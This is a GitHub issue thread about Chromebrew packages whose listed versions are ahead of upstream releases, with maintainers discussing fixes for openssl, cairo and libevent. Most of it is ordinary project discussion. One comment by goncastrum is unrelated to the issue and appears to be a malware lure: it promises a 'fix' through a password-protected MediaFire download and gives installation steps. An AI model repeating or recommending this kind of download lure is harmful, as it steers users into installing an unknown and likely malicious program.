### ISSUE TITLE
Incorrect package versions

### ISSUE THREAD

**Issue by Zopolis4** [chromebrew/chromebrew#10395]
**Describe the bug**
Some packages have versions that are not available upstream-- this is misleading to display as a package manager, and against Repology policy: https://github.com/repology/repology-updater/issues/1236#issuecomment-2323526201

- [x] openssl: Chromebrew version `3.3.2-ed16083`, upstream version `3.3.1`.
- [ ] libevent: Chromebrew version `2.2-64decd4`, upstream version `2.1.12`.
- [x] cairo: Chromebrew version `1.18.1-43e08ae`, upstream version `1.18.2` (released 9 hours ago, there was no `1.18.1` before it.)

**Comment by satmandu** [comment]
Commented in that thread for guidance on how we should best proceed. I think a major problem here is that many projects use internal project version numbering after a release is tagged that are incremented from the last release version, and thus are higher than the last officially tagged release.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Zopolis4** [comment]
>  I think a major problem here is that many projects use internal project version numbering after a release is tagged that are incremented from the last release version, and thus are higher than the last officially tagged release.

Even still, the solution is just to use the tagged release version even if the development version is higher-- that's what other package managers do, and thats what we do most of the time anyways.

**Comment by Zopolis4** [comment]
openssl, ffmpegthumbnailer, cage, and gperf are done. I'll do libevent once a proper 2.2 release rolls around because it has a lot of changes I'd like to bundle in, and doing a commit hash ontop of an alpha release feels off.

**Comment by satmandu** [comment]
I would wait on updating `cairo` until the python PR is done...

**Comment by satmandu** [comment]
Python PR is done, so feel free to mess with Cairo...

**Comment by satmandu** [comment]
Libevent looks nowhere near a 2.2 release... :/

**Comment by Zopolis4** [comment]
I guess we'll have to wait :p

**Comment by Zopolis4** [comment]
nuh uh

**Comment by Zopolis4** [comment]
nah libevent still hasn't released 2.2 yet
